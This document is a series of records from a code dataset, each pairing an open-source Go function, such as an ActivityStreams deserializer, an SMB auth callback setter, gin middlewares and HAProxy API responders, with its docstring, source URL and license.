this.ActivityStreamsCc = p
}
if p, err := mgr.DeserializeContentPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsContent = p
}
if p, err := mgr.DeserializeContextPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsContext = p
}
if p, err := mgr.DeserializeDurationPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsDuration = p
}
if p, err := mgr.DeserializeEndTimePropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsEndTime = p
}
if p, err := mgr.DeserializeGeneratorPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsGenerator = p
}
if p, err := mgr.DeserializeIconPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsIcon = p
}
if p, err := mgr.DeserializeIdPropertyJSONLD()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.JSONLDId = p
}
if p, err := mgr.DeserializeImagePropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsImage = p
}
if p, err := mgr.DeserializeInReplyToPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsInReplyTo = p
}
if p, err := mgr.DeserializeInstrumentPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsInstrument = p
}
if p, err := mgr.DeserializeLikesPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsLikes = p
}
if p, err := mgr.DeserializeLocationPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsLocation = p
}
if p, err := mgr.DeserializeMediaTypePropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsMediaType = p
}
if p, err := mgr.DeserializeNamePropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsName = p
}
if p, err := mgr.DeserializeObjectPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsObject = p
}
if p, err := mgr.DeserializeOriginPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsOrigin = p
}
if p, err := mgr.DeserializePreviewPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsPreview = p
}
if p, err := mgr.DeserializePublishedPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsPublished = p
}
if p, err := mgr.DeserializeRepliesPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsReplies = p
}
if p, err := mgr.DeserializeResultPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsResult = p
}
if p, err := mgr.DeserializeSharesPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsShares = p
}
if p, err := mgr.DeserializeSourcePropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsSource = p
}
if p, err := mgr.DeserializeStartTimePropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsStartTime = p
}
if p, err := mgr.DeserializeSummaryPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsSummary = p
}
if p, err := mgr.DeserializeTagPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsTag = p
}
if p, err := mgr.DeserializeTargetPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsTarget = p
}
if p, err := mgr.DeserializeTeamPropertyForgeFed()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ForgeFedTeam = p
}
if p, err := mgr.DeserializeTicketsTrackedByPropertyForgeFed()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ForgeFedTicketsTrackedBy = p
}
if p, err := mgr.DeserializeToPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsTo = p
}
if p, err := mgr.DeserializeTracksTicketsForPropertyForgeFed()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ForgeFedTracksTicketsFor = p
}
if p, err := mgr.DeserializeTypePropertyJSONLD()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.JSONLDType = p
}
if p, err := mgr.DeserializeUpdatedPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsUpdated = p
}
if p, err := mgr.DeserializeUrlPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsUrl = p
}
for k, v := range m {
if k == "actor" {
continue
} else if k == "altitude" {
continue
} else if k == "attachment" {
continue
} else if k == "attributedTo" {
continue
} else if k == "audience" {
continue
} else if k == "bcc" {
continue
} else if k == "bto" {
continue
} else if k == "cc" {
continue
} else if k == "content" {
continue
} else if k == "contentMap" {
continue
} else if k == "context" {
continue
} else if k == "duration" {
continue
} else if k == "endTime" {
continue
} else if k == "generator" {
continue
} else if k == "icon" {
continue
} else if k == "id" {
continue
} else if k == "image" {
continue
} else if k == "inReplyTo" {
continue
} else if k == "instrument" {
continue
} else if k == "likes" {
continue
} else if k == "location" {
continue
} else if k == "mediaType" {
continue
} else if k == "name" {
continue
} else if k == "nameMap" {
continue
} else if k == "object" {
continue
} else if k == "origin" {
continue
} else if k == "preview" {
continue
} else if k == "published" {
continue
} else if k == "replies" {
continue
} else if k == "result" {
continue
} else if k == "shares" {
continue
} else if k == "source" {
continue
} else if k == "startTime" {
continue
} else if k == "summary" {
continue
} else if k == "summaryMap" {
continue
} else if k == "tag" {
continue
} else if k == "target" {
continue
} else if k == "team" {
continue
} else if k == "ticketsTrackedBy" {
continue
} else if k == "to" {
continue
} else if k == "tracksTicketsFor" {
continue
} else if k == "type" {
continue
} else if k == "updated" {
continue
} else if k == "url" {
continue
}
this.unknown[k] = v
}
return this, nil
}
func IsOrExtendsActivity(other vocab.Type) bool {
if other.GetTypeName() == "Activity" {
return true
}
return ActivityIsExtendedBy(other)
}
func NewActivityStreamsActivity() *ActivityStreamsActivity {
typeProp := typePropertyConstructor()
typeProp.AppendXMLSchemaString("Activity")
return &ActivityStreamsActivity{
JSONLDType: typeProp,
alias: "",
unknown: make(map[string]interface{}),
}
}
func (this ActivityStreamsActivity) GetActivityStreamsActor() vocab.ActivityStreamsActorProperty {
return this.ActivityStreamsActor
}
func (this ActivityStreamsActivity) GetActivityStreamsAltitude() vocab.ActivityStreamsAltitudeProperty {
return this.ActivityStreamsAltitude
}
func (this ActivityStreamsActivity) GetActivityStreamsAttachment() vocab.ActivityStreamsAttachmentProperty {
return this.ActivityStreamsAttachment
}
func (this ActivityStreamsActivity) GetActivityStreamsAttributedTo() vocab.ActivityStreamsAttributedToProperty {
return this.ActivityStreamsAttributedTo
}
func (this ActivityStreamsActivity) GetActivityStreamsAudience() vocab.ActivityStreamsAudienceProperty {
return this.ActivityStreamsAudience
}
func (this ActivityStreamsActivity) GetActivityStreamsBcc() vocab.ActivityStreamsBccProperty {
return this.ActivityStreamsBcc
}
func (this ActivityStreamsActivity) GetActivityStreamsBto() vocab.ActivityStreamsBtoProperty {
return this.ActivityStreamsBto
}
func (this ActivityStreamsActivity) GetActivityStreamsCc() vocab.ActivityStreamsCcProperty {
return this.ActivityStreamsCc
}
func (this ActivityStreamsActivity) GetActivityStreamsContent() vocab.ActivityStreamsContentProperty {
return this.ActivityStreamsContent
}
func (this ActivityStreamsActivity) GetActivityStreamsContext() vocab.ActivityStreamsContextProperty {
return this.ActivityStreamsContext
}
func (this ActivityStreamsActivity) GetActivityStreamsDuration() vocab.ActivityStreamsDurationProperty {
return this.ActivityStreamsDuration
}
func (this ActivityStreamsActivity) GetActivityStreamsEndTime() vocab.ActivityStreamsEndTimeProperty {
return this.ActivityStreamsEndTime
}
func (this ActivityStreamsActivity) GetActivityStreamsGenerator() vocab.ActivityStreamsGeneratorProperty {
return this.ActivityStreamsGenerator
}
func (this ActivityStreamsActivity) GetActivityStreamsIcon() vocab.ActivityStreamsIconProperty {
return this.ActivityStreamsIcon
}
func (this ActivityStreamsActivity) GetActivityStreamsImage() vocab.ActivityStreamsImageProperty {
return this.ActivityStreamsImage
}
func (this ActivityStreamsActivity) GetActivityStreamsInReplyTo() vocab.ActivityStreamsInReplyToProperty {
return this.ActivityStreamsInReplyTo
}
func (this ActivityStreamsActivity) GetActivityStreamsInstrument() vocab.ActivityStreamsInstrumentProperty {
return this.ActivityStreamsInstrument
}
func (this ActivityStreamsActivity) GetActivityStreamsLikes() vocab.ActivityStreamsLikesProperty {
return this.ActivityStreamsLikes
}
func (this ActivityStreamsActivity) GetActivityStreamsLocation() vocab.ActivityStreamsLocationProperty {
return this.ActivityStreamsLocation
} | BSD 3-Clause New or Revised License |
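A minimal sketch of how the getter above is typically consumed inside the same generated package; absent properties come back as nil, so callers must check before use. Both symbols used below appear in this record.

// Sketch: NewActivityStreamsActivity and the getter are defined in this record.
activity := NewActivityStreamsActivity()
if mt := activity.GetActivityStreamsMediaType(); mt != nil {
	// mediaType was set on the object; use mt here.
} else {
	// Property absent: the getter returns nil rather than a zero-value property.
}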
mvo5/libsmbclient-go | libsmbclient.go | SetAuthCallback | go | func (c *Client) SetAuthCallback(f AuthCallback) {
c.smbMu.Lock()
defer c.smbMu.Unlock()
C.my_smbc_init_auth_callback(c.ctx, unsafe.Pointer(&f))
c.authCallback = &f
} | SetAuthCallback assigns the authentication function that will be called during connection
with samba. | https://github.com/mvo5/libsmbclient-go/blob/f9fa2a5c1104393a9bf39a4eed1de66e6cff4335/libsmbclient.go#L127-L135 | package libsmbclient
import (
"fmt"
"io"
"sync"
"unsafe"
)
import "C"
type SmbcType int
const (
SmbcWorkgroup SmbcType = C.SMBC_WORKGROUP
SmbcFileShare = C.SMBC_FILE_SHARE
SmbcPrinterShare = C.SMBC_PRINTER_SHARE
SmbcCommsShare = C.SMBC_COMMS_SHARE
SmbcIPCShare = C.SMBC_IPC_SHARE
SmbcDir = C.SMBC_DIR
SmbcFile = C.SMBC_FILE
SmbcLink = C.SMBC_LINK
)
var smbMu = sync.Mutex{}
type Client struct {
ctx *C.SMBCCTX
authCallback *AuthCallback
smbMu *sync.Mutex
}
type Dirent struct {
Type SmbcType
Comment string
Name string
}
type File struct {
client *Client
smbcfile *C.SMBCFILE
}
func New() *Client {
smbMu.Lock()
defer smbMu.Unlock()
c := &Client{
ctx: C.smbc_new_context(),
smbMu: &smbMu,
}
C.smbc_init_context(c.ctx)
return c
}
func (c *Client) Destroy() error {
return c.Close()
}
func (c *Client) Close() error {
c.smbMu.Lock()
defer c.smbMu.Unlock()
var err error
if c.ctx != nil {
_, err = C.smbc_free_context(c.ctx, C.int(1))
c.ctx = nil
}
return err
}
type AuthCallback = func(serverName, shareName string) (domain, username, password string) | MIT License |
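Usage sketch for SetAuthCallback above. The credentials are placeholders, and the package name follows the `package libsmbclient` declaration in this record.

// Sketch: static credentials supplied to every connection attempt.
c := libsmbclient.New()
defer c.Close()
c.SetAuthCallback(func(serverName, shareName string) (domain, username, password string) {
	// Placeholder credentials -- look them up per server/share in real code.
	return "WORKGROUP", "guest", ""
})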
haproxytech/dataplaneapi | operations/spoe/create_spoe_group_responses.go | NewCreateSpoeGroupConflict | go | func NewCreateSpoeGroupConflict() *CreateSpoeGroupConflict {
return &CreateSpoeGroupConflict{}
} | NewCreateSpoeGroupConflict creates CreateSpoeGroupConflict with default headers values | https://github.com/haproxytech/dataplaneapi/blob/b362aae0b04d0e330bd9dcfbf9f315b670de013b/operations/spoe/create_spoe_group_responses.go#L161-L164 | package spoe
import (
"net/http"
"github.com/go-openapi/runtime"
"github.com/haproxytech/client-native/v2/models"
)
const CreateSpoeGroupCreatedCode int = 201
type CreateSpoeGroupCreated struct {
Payload *models.SpoeGroup `json:"body,omitempty"`
}
func NewCreateSpoeGroupCreated() *CreateSpoeGroupCreated {
return &CreateSpoeGroupCreated{}
}
func (o *CreateSpoeGroupCreated) WithPayload(payload *models.SpoeGroup) *CreateSpoeGroupCreated {
o.Payload = payload
return o
}
func (o *CreateSpoeGroupCreated) SetPayload(payload *models.SpoeGroup) {
o.Payload = payload
}
func (o *CreateSpoeGroupCreated) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {
rw.WriteHeader(201)
if o.Payload != nil {
payload := o.Payload
if err := producer.Produce(rw, payload); err != nil {
panic(err)
}
}
}
const CreateSpoeGroupBadRequestCode int = 400
type CreateSpoeGroupBadRequest struct {
ConfigurationVersion string `json:"Configuration-Version"`
Payload *models.Error `json:"body,omitempty"`
}
func NewCreateSpoeGroupBadRequest() *CreateSpoeGroupBadRequest {
return &CreateSpoeGroupBadRequest{}
}
func (o *CreateSpoeGroupBadRequest) WithConfigurationVersion(configurationVersion string) *CreateSpoeGroupBadRequest {
o.ConfigurationVersion = configurationVersion
return o
}
func (o *CreateSpoeGroupBadRequest) SetConfigurationVersion(configurationVersion string) {
o.ConfigurationVersion = configurationVersion
}
func (o *CreateSpoeGroupBadRequest) WithPayload(payload *models.Error) *CreateSpoeGroupBadRequest {
o.Payload = payload
return o
}
func (o *CreateSpoeGroupBadRequest) SetPayload(payload *models.Error) {
o.Payload = payload
}
func (o *CreateSpoeGroupBadRequest) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {
configurationVersion := o.ConfigurationVersion
if configurationVersion != "" {
rw.Header().Set("Configuration-Version", configurationVersion)
}
rw.WriteHeader(400)
if o.Payload != nil {
payload := o.Payload
if err := producer.Produce(rw, payload); err != nil {
panic(err)
}
}
}
const CreateSpoeGroupConflictCode int = 409
type CreateSpoeGroupConflict struct {
ConfigurationVersion string `json:"Configuration-Version"`
Payload *models.Error `json:"body,omitempty"`
} | Apache License 2.0 |
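Sketch of the builder pattern these generated responders follow; `cfgVersion`, `apiErr`, `rw`, and `producer` are assumed to be supplied by the surrounding go-swagger handler plumbing and are not defined in this record.

// Sketch: answer a duplicate-group request with the 409 responder defined above.
resp := spoe.NewCreateSpoeGroupConflict().WithConfigurationVersion(cfgVersion)
resp.SetPayload(apiErr) // apiErr is a *models.Error built elsewhere
resp.WriteResponse(rw, producer)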
anz-bank/go-course | 10_rest/runnerdave/pkg/puppy/store/map_store.go | ReadPuppy | go | func (m *MapStore) ReadPuppy(id int16) (puppy.Puppy, error) {
if puppy, ok := m.puppies[id]; ok {
return puppy, nil
}
return puppy.Puppy{}, puppy.Errorf(puppy.ErrIDNotFound, "puppy with ID:%d not found", id)
} | ReadPuppy reads store by Puppy ID | https://github.com/anz-bank/go-course/blob/cf576ffe0ec3db4ee1834533a43ea439d27973bc/10_rest/runnerdave/pkg/puppy/store/map_store.go#L32-L37 | package store
import (
puppy "github.com/anz-bank/go-course/10_rest/runnerdave/pkg/puppy"
)
type MapStore struct {
puppies map[int16]puppy.Puppy
nextID int16
}
func NewMapStore() *MapStore {
return &MapStore{
nextID: 1,
puppies: map[int16]puppy.Puppy{}}
}
func (m *MapStore) CreatePuppy(p puppy.Puppy) error {
if err := puppy.ValidateValue(p.Value); err != nil {
return err
}
p.ID = m.nextID
m.puppies[p.ID] = p
m.nextID++
return nil
} | Apache License 2.0 |
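Usage sketch for the map-backed store above. Puppy fields other than ID are not shown in this record, so the value below is left mostly zero and assumed to pass puppy.ValidateValue.

// Sketch: create a puppy, then read it back by the ID the store assigned.
s := store.NewMapStore()
var p puppy.Puppy // assumption: populated so that puppy.ValidateValue(p.Value) succeeds
if err := s.CreatePuppy(p); err != nil {
	log.Fatal(err)
}
got, err := s.ReadPuppy(1) // IDs are handed out sequentially starting at 1
if err != nil {
	log.Fatal(err)
}
_ = got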
sosedoff/pgweb | pkg/api/middleware.go | dbCheckMiddleware | go | func dbCheckMiddleware() gin.HandlerFunc {
return func(c *gin.Context) {
path := strings.Replace(c.Request.URL.Path, command.Opts.Prefix, "", -1)
if allowedPaths[path] {
c.Next()
return
}
if !command.Opts.Sessions {
if DbClient == nil {
badRequest(c, errNotConnected)
return
}
c.Next()
return
}
sid := getSessionId(c.Request)
if sid == "" {
badRequest(c, errSessionRequired)
return
}
conn := DbSessions[sid]
if conn == nil {
badRequest(c, errNotConnected)
return
}
c.Next()
}
} | Middleware to check database connection status before running queries | https://github.com/sosedoff/pgweb/blob/be6ef48d407dcfccfb5a06681d698a03dde30759/pkg/api/middleware.go#L13-L50 | package api
import (
"log"
"strings"
"github.com/gin-gonic/gin"
"github.com/sosedoff/pgweb/pkg/command"
) | MIT License |
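Sketch of how a middleware like this is attached; dbCheckMiddleware is unexported, so this wiring lives in the same package, and the route group prefix is illustrative rather than taken from pgweb's actual router setup.

// Sketch: every route in the group passes the connection check before its handler runs.
router := gin.New()
api := router.Group("/api") // illustrative prefix
api.Use(dbCheckMiddleware())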
uber-archive/cherami-server | common/configure/commonappconfig.go | GetFrontendConfig | go | func (r *AppConfig) GetFrontendConfig() CommonFrontendConfig {
return r.FrontendConfig
} | GetFrontendConfig returns the frontend config | https://github.com/uber-archive/cherami-server/blob/da747b7be487feeaba1a5d7cb01e71343e6f8452/common/configure/commonappconfig.go#L72-L74 | package configure
type AppConfig struct {
LogConfig *LogConfiguration `yaml:"logging"`
DefaultServiceConfig *ServiceConfig `yaml:"DefaultServiceConfig"`
ServiceConfig map[string]*ServiceConfig `yaml:"ServiceConfig"`
MetadataConfig *MetadataConfig `yaml:"MetadataConfig"`
ControllerConfig *ControllerConfig `yaml:"ControllerConfig"`
FrontendConfig *FrontendConfig `yaml:"FrontendConfig"`
StorageConfig *StorageConfig `yaml:"StorageConfig"`
ReplicatorConfig *ReplicatorConfig `yaml:"ReplicatorConfig"`
KafkaConfig *KafkaConfig `yaml:"KafkaConfig"`
DefaultDestinationConfig *DestinationConfig `yaml:"DefaultDestinationConfig"`
}
func NewCommonAppConfig() CommonAppConfig {
return &AppConfig{
LogConfig: NewCommonLogConfig(),
DefaultServiceConfig: NewCommonServiceConfig(),
ServiceConfig: make(map[string]*ServiceConfig),
MetadataConfig: NewCommonMetadataConfig(),
ControllerConfig: NewCommonControllerConfig(),
FrontendConfig: NewCommonFrontendConfig(),
StorageConfig: NewCommonStorageConfig(),
ReplicatorConfig: NewCommonReplicatorConfig(),
DefaultDestinationConfig: NewDestinationConfig(),
KafkaConfig: NewCommonKafkaConfig(),
}
}
func (r *AppConfig) GetServiceConfig(sName string) CommonServiceConfig {
sCfg, _ := r.ServiceConfig[sName]
return sCfg
}
func (r *AppConfig) GetMetadataConfig() CommonMetadataConfig {
return r.MetadataConfig
}
func (r *AppConfig) GetControllerConfig() CommonControllerConfig {
return r.ControllerConfig
} | MIT License |
google/fleetspeak | fleetspeak/src/client/socketservice/client/proxy.go | OpenChannel | go | func OpenChannel(socketPath string, version string) *channel.RelentlessChannel {
return channel.NewRelentlessChannel(
func() (*channel.Channel, func()) {
sd, err := ptypes.MarshalAny(&fcpb.StartupData{Pid: int64(os.Getpid()), Version: version})
if err != nil {
log.Fatalf("unable to marshal StartupData: %v", err)
}
m := &fspb.Message{
MessageType: "StartupData",
Destination: &fspb.Address{ServiceName: "system"},
Data: sd,
}
L:
for {
ch, fin := buildChannel(socketPath)
if ch == nil {
return ch, fin
}
select {
case e := <-ch.Err:
log.Errorf("Channel failed with error: %v", e)
fin()
continue L
case ch.Out <- m:
return ch, fin
}
}
})
} | OpenChannel creates a channel.RelentlessChannel to a fleetspeak client
through an agreed upon unix domain socket. | https://github.com/google/fleetspeak/blob/a386c35b582a0220609bbd5fb3e7057bff43ddaa/fleetspeak/src/client/socketservice/client/proxy.go#L49-L77 | package client
import (
"os"
"time"
log "github.com/golang/glog"
"github.com/golang/protobuf/ptypes"
"github.com/google/fleetspeak/fleetspeak/src/client/channel"
fcpb "github.com/google/fleetspeak/fleetspeak/src/client/channel/proto/fleetspeak_channel"
fspb "github.com/google/fleetspeak/fleetspeak/src/common/proto/fleetspeak"
)
const (
maxChannelRetryDelay = 15 * time.Second
channelRetryBackoffFactor = 1.5
)
func backOffChannelRetryDelay(currentDelay time.Duration) time.Duration {
newDelay := time.Duration(float64(currentDelay) * channelRetryBackoffFactor)
if newDelay > maxChannelRetryDelay {
return maxChannelRetryDelay
} else {
return newDelay
}
} | Apache License 2.0 |
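Usage sketch for OpenChannel above. The socket path and version string are placeholders, and the In field on RelentlessChannel is an assumption based on the channel.Channel usage visible in the function body.

// Sketch: a daemon service process connecting back to the local Fleetspeak client.
ch := client.OpenChannel("/var/run/fleetspeak/service.sock", "0.1.0")
for msg := range ch.In { // assumption: RelentlessChannel exposes In like channel.Channel
	log.Infof("received %s message", msg.MessageType)
}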
leopardslab/dunner | internal/util/util.go | DirExists | go | func DirExists(dir string) bool {
if strings.HasPrefix(dir, "~") {
dir = path.Join(HomeDir, strings.Trim(dir, "~"))
}
src, err := os.Stat(dir)
if err != nil {
return false
}
return src.IsDir()
} | DirExists returns true if the given param is a valid existing directory | https://github.com/leopardslab/dunner/blob/3017143faf209b074073e442092119a820ec5291/internal/util/util.go#L50-L59 | package util
import (
"flag"
"fmt"
"io"
"io/ioutil"
"net/http"
"os"
"os/exec"
"path"
"strings"
"time"
"github.com/leopardslab/dunner/internal/logger"
)
var log = logger.Log
var HomeDir = os.Getenv("HOME")
var userDir = os.Getenv("user")
type progressReader struct {
io.Reader
bytesTransfered int64
totalBytes int64
progress float64
progressDisplayed bool
}
func (w *progressReader) Read(p []byte) (int, error) {
n, err := w.Reader.Read(p)
if n > 0 {
w.bytesTransfered += int64(n)
percent := float64(w.bytesTransfered) * float64(100) / float64(w.totalBytes)
if percent-w.progress > 4 {
fmt.Print(".")
w.progress = percent
w.progressDisplayed = true
}
}
return n, err
} | MIT License |
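A short sketch of the guard this helper enables; the directory path is illustrative.

// Sketch: fail fast when an expected directory (possibly "~"-prefixed) is missing.
if !util.DirExists("~/.dunner") {
	log.Fatal("directory ~/.dunner does not exist or is not a directory")
}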
bnei-baruch/archive-backend | utils/middleware.go | RecoveryMiddleware | go | func RecoveryMiddleware() gin.HandlerFunc {
return func(c *gin.Context) {
defer func() {
if rval := recover(); rval != nil {
debug.PrintStack()
err, ok := rval.(error)
if !ok {
err = errors.Errorf("panic: %s", rval)
}
c.AbortWithError(http.StatusInternalServerError, err).SetType(gin.ErrorTypePrivate)
}
}()
c.Next()
}
} | Recover with error | https://github.com/bnei-baruch/archive-backend/blob/5d750b0b9edf6554adfdb0708593146050c0c816/utils/middleware.go#L51-L66 | package utils
import (
"database/sql"
"encoding/json"
"fmt"
"net/http"
"runtime/debug"
"time"
log "github.com/Sirupsen/logrus"
"github.com/pkg/errors"
"gopkg.in/gin-gonic/gin.v1"
"gopkg.in/go-playground/validator.v8"
)
func DataStoresMiddleware(mbdDB *sql.DB, esManager, logger, cm interface{} , tc interface{}, cms interface{}, variables interface{}) gin.HandlerFunc {
return func(c *gin.Context) {
c.Set("MDB_DB", mbdDB)
c.Set("ES_MANAGER", esManager)
c.Set("LOGGER", logger)
c.Set("CACHE", cm)
c.Set("VARIABLES", variables)
c.Set("TOKENS_CACHE", tc)
c.Set("CMS", cms)
c.Next()
}
}
func LoggerMiddleware() gin.HandlerFunc {
return func(c *gin.Context) {
start := time.Now()
path := c.Request.URL.RequestURI()
c.Next()
log.WithFields(log.Fields{
"status": c.Writer.Status(),
"method": c.Request.Method,
"path": path,
"latency": time.Now().Sub(start),
"ip": c.ClientIP(),
"user-agent": c.Request.UserAgent(),
}).Info()
}
} | MIT License |
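Sketch of wiring the middlewares above into a gin engine; the ordering (logger first, then recovery) is a choice made for this sketch, not mandated by the source.

// Sketch: panics inside handlers become 500 responses instead of crashing the process.
router := gin.New()
router.Use(utils.LoggerMiddleware(), utils.RecoveryMiddleware())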
digota/digota | product/product.go | WriteMethods | go | func WriteMethods() []*regexp.Regexp {
return []*regexp.Regexp{
regexp.MustCompile(baseMethod + "New"),
regexp.MustCompile(baseMethod + "Update"),
regexp.MustCompile(baseMethod + "Delete"),
}
} | WriteMethods returns regexp slice of writable methods, mostly used by the acl | https://github.com/digota/digota/blob/c2a16d57bfe0fd0d6f3a7b9a71122668a24c1e6c/product/product.go#L70-L76 | package product
import (
"github.com/digota/digota/product/productpb"
"google.golang.org/grpc"
"regexp"
)
const baseMethod = "^(.productpb.ProductService/)"
var service Interface
type Interface interface {
productpb.ProductServiceServer
}
func RegisterService(p Interface) {
if service != nil {
panic("ProductService is already registered")
}
service = p
}
func Service() Interface {
if service == nil {
panic("ProductService is not registered")
}
return service
}
func RegisterProductServer(server *grpc.Server) {
productpb.RegisterProductServiceServer(server, Service())
}
func ReadMethods() []*regexp.Regexp {
return []*regexp.Regexp{
regexp.MustCompile(baseMethod + "Get"),
regexp.MustCompile(baseMethod + "List"),
}
} | MIT License |
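Sketch of the ACL-style check these regexp lists are meant for; the gRPC full-method strings below mirror the shape the patterns expect.

// Sketch: classify an incoming gRPC method as a write operation.
func isWriteMethod(fullMethod string) bool {
	for _, re := range product.WriteMethods() {
		if re.MatchString(fullMethod) {
			return true
		}
	}
	return false
}

// isWriteMethod("/productpb.ProductService/New") -> true
// isWriteMethod("/productpb.ProductService/Get") -> false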
criyle/go-judge | worker/file.go | EnvFile | go | func (f *CachedFile) EnvFile(fs filestore.FileStore) (envexec.File, error) {
_, fd := fs.Get(f.FileID)
if fd == nil {
return nil, fmt.Errorf("file not exists with id %v", f.FileID)
}
return fd, nil
} | EnvFile prepares file for envexec file | https://github.com/criyle/go-judge/blob/7f0b066258abadabec48cb1cb08d7ee83d7bbfc8/worker/file.go#L60-L66 | package worker
import (
"bytes"
"fmt"
"github.com/criyle/go-judge/envexec"
"github.com/criyle/go-judge/filestore"
)
type CmdFile interface {
EnvFile(fs filestore.FileStore) (envexec.File, error)
String() string
}
var (
_ CmdFile = &LocalFile{}
_ CmdFile = &MemoryFile{}
_ CmdFile = &CachedFile{}
_ CmdFile = &Collector{}
)
type LocalFile struct {
Src string
}
func (f *LocalFile) EnvFile(fs filestore.FileStore) (envexec.File, error) {
return envexec.NewFileInput(f.Src), nil
}
func (f *LocalFile) String() string {
return fmt.Sprintf("local:%s", f.Src)
}
type MemoryFile struct {
Content []byte
}
func (f *MemoryFile) EnvFile(fs filestore.FileStore) (envexec.File, error) {
return envexec.NewFileReader(bytes.NewReader(f.Content), false), nil
}
func (f *MemoryFile) String() string {
return fmt.Sprintf("memory:(len:%d)", len(f.Content))
}
type CachedFile struct {
FileID string
} | MIT License |
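Sketch showing the three CmdFile implementations above being resolved to envexec files; `fs` (a filestore.FileStore) and `cachedID` are assumptions supplied by the caller.

// Sketch: mix in-memory, on-disk and cached inputs behind the same interface.
func resolveInputs(fs filestore.FileStore, cachedID string) ([]envexec.File, error) {
	inputs := []worker.CmdFile{
		&worker.MemoryFile{Content: []byte("stdin data")},
		&worker.LocalFile{Src: "/tmp/input.txt"},
		&worker.CachedFile{FileID: cachedID},
	}
	out := make([]envexec.File, 0, len(inputs))
	for _, in := range inputs {
		f, err := in.EnvFile(fs) // CachedFile errors if the id is gone from the store
		if err != nil {
			return nil, err
		}
		out = append(out, f)
	}
	return out, nil
}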
browsefile/backend | src/lib/web/users.go | parseUserFromRequest | go | func parseUserFromRequest(c *fb.Context) (*fb.UserModel, string, error) {
if c.REQ.Body == nil {
return nil, "", cnst.ErrEmptyRequest
}
mod := &ModifyUserRequest{}
err := json.NewDecoder(c.REQ.Body).Decode(mod)
if err != nil {
return nil, "", err
}
if mod.What != "user" {
return nil, "", cnst.ErrWrongDataType
}
mod.Data.FileSystem = c.NewFS(c.GetUserHomePath())
mod.Data.FileSystemPreview = c.NewFS(c.GetUserPreviewPath())
return mod.Data, mod.Which, nil
} | parseUserFromRequest returns the user which is present in the request
body. If the body is empty or the JSON is invalid, it
returns an fb.Error. | https://github.com/browsefile/backend/blob/d7bd10276405a22706605505d24da07029db823b/src/lib/web/users.go#L62-L83 | package web
import (
"encoding/json"
"errors"
"github.com/browsefile/backend/src/cnst"
"net/http"
"os"
"strings"
fb "github.com/browsefile/backend/src/lib"
)
type ModifyRequest struct {
What string `json:"what"`
Which string `json:"which"`
}
type ModifyUserRequest struct {
ModifyRequest
Data *fb.UserModel `json:"data"`
}
func usersHandler(c *fb.Context) (int, error) {
if !c.User.Admin && c.Method != http.MethodGet {
return http.StatusForbidden, nil
}
switch c.Method {
case http.MethodGet:
return usersGetHandler(c)
case http.MethodPost:
return usersPostHandler(c)
case http.MethodDelete:
return usersDeleteHandler(c)
case http.MethodPut:
return usersPutHandler(c)
}
return http.StatusNotImplemented, nil
}
func getUserName(r string) (string) {
sid := strings.TrimPrefix(r, "/")
sid = strings.TrimSuffix(sid, "/")
return sid
} | Apache License 2.0 |
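For reference, a sketch of the smallest JSON body the parser above accepts: "what" must be exactly "user", "which" names the target user, and "data" maps onto fb.UserModel, whose fields are not shown in this record.

// Sketch: the user name and the empty data object are placeholders.
const modifyUserBody = `{"what": "user", "which": "alice", "data": {}}`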
mosaicnetworks/evm-lite | src/version/version_test.go | TestFlagEmpty | go | func TestFlagEmpty(t *testing.T) {
if len(Flag) > 0 {
t.Fatalf("Version Flag is not empty: %s", Flag)
}
} | TestFlagEmpty fails if version.Flag is not empty. We use this internally to
enforce an empty flag on the master branch. This is an arbitrary rule we use
